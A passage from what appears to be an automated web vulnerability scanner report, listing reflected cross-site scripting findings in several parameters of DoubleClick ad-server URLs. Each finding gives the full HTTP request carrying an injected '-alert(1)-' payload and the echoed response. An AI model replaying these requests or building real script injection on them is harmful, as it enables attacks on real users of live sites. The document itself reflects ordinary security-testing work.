Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7421
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 16:15:05 GMT
Expires: Sun, 24 Apr 2011 16:15:05 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Sat Apr 02 18:55:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1
...[SNIP]...
YW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YrgCGMgC94qgG6gDAdEDHROmdxAz1pjoA7wB6AOUAvUDAAAAxA&num=1&sig=AGiWqty58OsInd0vwE_hq6qLB0DF4PWwgw&client=ca-pub-6888065668292638&adurl=db526"-alert(1)-"f38d76248c2http://www.homeaway.com?cid=B_Detourism_BR_T_160x600_HotelLivingRoom_LHP_469252");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptacces
...[SNIP]...

6.7. http://ad.doubleclick.net/adi/N3671.Google/B5102071.8 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.Google/B5102071.8

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 902fa"-alert(1)-"16a9e2df61f was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3671.Google/B5102071.8;sz=160x600;pc=gdnHwu80gEAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BfYqAHEy0TbPrEcuBlgeC9vCrAseG85QCx7X3yR3AjbcB8LT4ARABGAEg2aK3DzgAUPuY1pwHYMnug4jwo-wSoAGhvOPWA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YrgCGMgC94qgG6gDAdEDHROmdxAz1pjoA7wB6AOUAvUDAAAAxA902fa"-alert(1)-"16a9e2df61f&num=1&sig=AGiWqty58OsInd0vwE_hq6qLB0DF4PWwgw&client=ca-pub-6888065668292638&adurl=;ord=1061289247? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679599&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661599233&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661599239&frm=1&adk=2614322350&ga_vid=1010643910.1303661599&ga_sid=1303661599&ga_hid=1918276477&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:14:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7451

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Sat Apr 02 18:55:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1
...[SNIP]...
3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YrgCGMgC94qgG6gDAdEDHROmdxAz1pjoA7wB6AOUAvUDAAAAxA902fa"-alert(1)-"16a9e2df61f&num=1&sig=AGiWqty58OsInd0vwE_hq6qLB0DF4PWwgw&client=ca-pub-6888065668292638&adurl=http%3a%2f%2fwww.homeaway.com%3Fcid%3DB_Detourism_BR_T_160x600_HotelLivingRoom_LHP_469252");
var fscUrl = url;
var
...[SNIP]...

6.8. http://ad.doubleclick.net/adi/N3671.Google/B5102071.8 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.Google/B5102071.8

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc4e9"-alert(1)-"46c4c91ad9c was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3671.Google/B5102071.8;sz=160x600;pc=gdnHwu80gEAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BfYqAHEy0TbPrEcuBlgeC9vCrAseG85QCx7X3yR3AjbcB8LT4ARABGAEg2aK3DzgAUPuY1pwHYMnug4jwo-wSoAGhvOPWA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YrgCGMgC94qgG6gDAdEDHROmdxAz1pjoA7wB6AOUAvUDAAAAxA&num=1&sig=AGiWqty58OsInd0vwE_hq6qLB0DF4PWwgw&client=ca-pub-6888065668292638dc4e9"-alert(1)-"46c4c91ad9c&adurl=;ord=1061289247? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679599&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661599233&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661599239&frm=1&adk=2614322350&ga_vid=1010643910.1303661599&ga_sid=1303661599&ga_hid=1918276477&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:14:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7447

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Sat Apr 02 18:55:53 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1
...[SNIP]...
WlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YrgCGMgC94qgG6gDAdEDHROmdxAz1pjoA7wB6AOUAvUDAAAAxA&num=1&sig=AGiWqty58OsInd0vwE_hq6qLB0DF4PWwgw&client=ca-pub-6888065668292638dc4e9"-alert(1)-"46c4c91ad9c&adurl=http%3a%2f%2fwww.homeaway.com%3Fcid%3DB_Detourism_BR_T_160x600_HotelDeckChair_LHP_469252");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dc
...[SNIP]...

6.9. http://ad.doubleclick.net/adi/N3671.Google/B5102071.8 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.Google/B5102071.8

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f572"-alert(1)-"5b1932e7733 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3671.Google/B5102071.8;sz=160x600;pc=gdnHwu80gEAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BfYqAHEy0TbPrEcuBlgeC9vCrAseG85QCx7X3yR3AjbcB8LT4ARABGAEg2aK3DzgAUPuY1pwHYMnug4jwo-wSoAGhvOPWA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YrgCGMgC94qgG6gDAdEDHROmdxAz1pjoA7wB6AOUAvUDAAAAxA&num=12f572"-alert(1)-"5b1932e7733&sig=AGiWqty58OsInd0vwE_hq6qLB0DF4PWwgw&client=ca-pub-6888065668292638&adurl=;ord=1061289247? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679599&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661599233&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661599239&frm=1&adk=2614322350&ga_vid=1010643910.1303661599&ga_sid=1303661599&ga_hid=1918276477&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:14:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7447

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Sat Apr 02 18:55:53 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1
...[SNIP]...
yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YrgCGMgC94qgG6gDAdEDHROmdxAz1pjoA7wB6AOUAvUDAAAAxA&num=12f572"-alert(1)-"5b1932e7733&sig=AGiWqty58OsInd0vwE_hq6qLB0DF4PWwgw&client=ca-pub-6888065668292638&adurl=http%3a%2f%2fwww.homeaway.com%3Fcid%3DB_Detourism_BR_T_160x600_HotelDeckChair_LHP_469252");
var fscUrl = url;
var fscUrl
...[SNIP]...

6.10. http://ad.doubleclick.net/adi/N3671.Google/B5102071.8 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.Google/B5102071.8

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1986d"-alert(1)-"dea48e3dd70 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3671.Google/B5102071.8;sz=160x600;pc=gdnHwu80gEAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BfYqAHEy0TbPrEcuBlgeC9vCrAseG85QCx7X3yR3AjbcB8LT4ARABGAEg2aK3DzgAUPuY1pwHYMnug4jwo-wSoAGhvOPWA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YrgCGMgC94qgG6gDAdEDHROmdxAz1pjoA7wB6AOUAvUDAAAAxA&num=1&sig=AGiWqty58OsInd0vwE_hq6qLB0DF4PWwgw1986d"-alert(1)-"dea48e3dd70&client=ca-pub-6888065668292638&adurl=;ord=1061289247? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679599&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661599233&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661599239&frm=1&adk=2614322350&ga_vid=1010643910.1303661599&ga_sid=1303661599&ga_hid=1918276477&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:14:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7451

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Sat Apr 02 18:55:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1
...[SNIP]...
9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YrgCGMgC94qgG6gDAdEDHROmdxAz1pjoA7wB6AOUAvUDAAAAxA&num=1&sig=AGiWqty58OsInd0vwE_hq6qLB0DF4PWwgw1986d"-alert(1)-"dea48e3dd70&client=ca-pub-6888065668292638&adurl=http%3a%2f%2fwww.homeaway.com%3Fcid%3DB_Detourism_BR_T_160x600_HotelLivingRoom_LHP_469252");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "
...[SNIP]...

6.11. http://ad.doubleclick.net/adi/N3671.Google/B5102071.8 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.Google/B5102071.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf3ca"-alert(1)-"a302272b5bd was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3671.Google/B5102071.8;sz=160x600;pc=gdnHwu80gEAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=lbf3ca"-alert(1)-"a302272b5bd&ai=BfYqAHEy0TbPrEcuBlgeC9vCrAseG85QCx7X3yR3AjbcB8LT4ARABGAEg2aK3DzgAUPuY1pwHYMnug4jwo-wSoAGhvOPWA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YrgCGMgC94qgG6gDAdEDHROmdxAz1pjoA7wB6AOUAvUDAAAAxA&num=1&sig=AGiWqty58OsInd0vwE_hq6qLB0DF4PWwgw&client=ca-pub-6888065668292638&adurl=;ord=1061289247? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679599&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661599233&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661599239&frm=1&adk=2614322350&ga_vid=1010643910.1303661599&ga_sid=1303661599&ga_hid=1918276477&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:13:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7451

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Sat Apr 02 18:55:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1
...[SNIP]...
click%3Bh%3Dv8/3af3/f/1ca/%2a/n%3B239550138%3B0-0%3B0%3B58795375%3B2321-160/600%3B41530191/41547978/1%3B%3B%7Eokv%3D%3Bpc%3DgdnHwu80gEAAAA%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lbf3ca"-alert(1)-"a302272b5bd&ai=BfYqAHEy0TbPrEcuBlgeC9vCrAseG85QCx7X3yR3AjbcB8LT4ARABGAEg2aK3DzgAUPuY1pwHYMnug4jwo-wSoAGhvOPWA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9i
...[SNIP]...

6.12. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [age parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4860.158901.DATAXU/B5300325.14

Issue detail

The value of the age request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed328"-alert(1)-"4ca1fa8c515 was submitted in the age parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=ed328"-alert(1)-"4ca1fa8c515&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:23:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7540

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
A1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=ed328"-alert(1)-"4ca1fa8c515&zc=NzUyMDc&rurl=http%3a%2f%2fwww.newark.com/jsp/bespoke/bespoke7.jsp%3Fbespokepage%3Dcommon/en/technology-first/whats-new/whats-new.jsp%26CMP%3DBAN-L0-Opto");
var fscUrl = url;
var fscUrlClickTagF
...[SNIP]...

6.13. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [ccw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4860.158901.DATAXU/B5300325.14

Issue detail

The value of the ccw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63451"-alert(1)-"7fbc9de3120 was submitted in the ccw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA463451"-alert(1)-"7fbc9de3120&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:21:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7522

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
